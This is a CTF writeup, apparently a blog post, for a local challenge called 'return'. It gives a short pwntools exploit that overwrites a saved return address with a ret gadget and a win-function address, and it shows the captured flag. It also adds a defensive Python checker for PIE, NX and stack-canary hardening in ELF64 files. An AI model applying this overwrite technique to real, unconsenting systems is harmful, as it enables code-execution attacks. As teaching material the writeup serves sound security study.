Pwnctf return Writeup

kazma, founder/president of the NCKU Information Security Club (成大資安社)

return

A classic bof: jump to this evil thing and you're done. Remember to align the stack to 0x10:

return

exploit.py:

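from pwn import *

r = process('./return')

ret = 0x400539  # `ret` gadget, inserted only to keep the stack 0x10-aligned
win = 0x4006b6  # function to jump to

# 0x38 bytes of padding, then the new return addresses
r.sendlineafter(b':)', b'a'*0x38 + p64(ret) + p64(win))
r.interactive()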

result:

└─$ python exploit.py
[+] Starting local process './return': pid 305499
[*] Switching to interactive mode

$ cat flag
BreakAllCTF{G00d_j0000000000b:)}

Pwned !!!
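A payload like the one in exploit.py depends on fixed code addresses and on a saved return address that can be overwritten unnoticed. The following is an added example, not part of the original writeup: a small ELF64 check for the build options that remove those preconditions (PIE, stack protector, non-executable stack). The sample images are constructed in the code and are not the challenge binary; the function names are this example's own.

```python
import struct

ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PF_X = 0x6474E551, 0x1
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # ELF64 file header (64 bytes)
PHDR = struct.Struct("<IIQQQQQQ")          # ELF64 program header (56 bytes)

def check_mitigations(elf: bytes) -> dict:
    """Report the hardening properties relevant to a return-address overwrite."""
    if elf[:4] != b"\x7fELF" or elf[4:6] != b"\x02\x01":
        raise ValueError("expected a little-endian ELF64 image")
    hdr = EHDR.unpack_from(elf, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    nx = False  # without a PT_GNU_STACK entry the stack may be mapped executable
    for i in range(e_phnum):
        p_type, p_flags = PHDR.unpack_from(elf, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,                # False: code addresses are fixed
        "nx": nx,
        "canary": b"__stack_chk_fail" in elf,   # heuristic: symbol name in the image
    }

def findings(m: dict) -> list:
    """Turn the raw flags into the issues a reviewer would file."""
    out = []
    if not m["pie"]:
        out.append("no PIE: hard-coded code addresses stay valid on every run")
    if not m["canary"]:
        out.append("no stack protector: a saved return address can be overwritten silently")
    if not m["nx"]:
        out.append("executable stack")
    return out

def build_sample(e_type: int, stack_flags: int, extra: bytes = b"") -> bytes:
    """Constructed image (not the challenge binary): header + PT_GNU_STACK + strings."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
    ehdr = EHDR.pack(ident, e_type, 0x3E, 1, 0, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, 1, 0, 0, 0)
    return ehdr + PHDR.pack(PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16) + extra

if __name__ == "__main__":
    weak = build_sample(ET_EXEC, 0x6)                        # RW stack, fixed base
    hard = build_sample(ET_DYN, 0x6, b"\0__stack_chk_fail\0")
    for name, img in (("weak", weak), ("hardened", hard)):
        print(name, check_mitigations(img), findings(check_mitigations(img)))
```

On a real build, `-fstack-protector-strong` and `-fPIE -pie` are the GCC/Clang options that flip the `canary` and `pie` results.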

  • Title: Pwnctf return Writeup
  • Author: kazma
  • Created at : 2023-12-21 16:42:58
  • Updated at : 2023-12-21 16:47:36
  • Link: https://kazma.tw/2023/12/21/Pwnctf-return-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.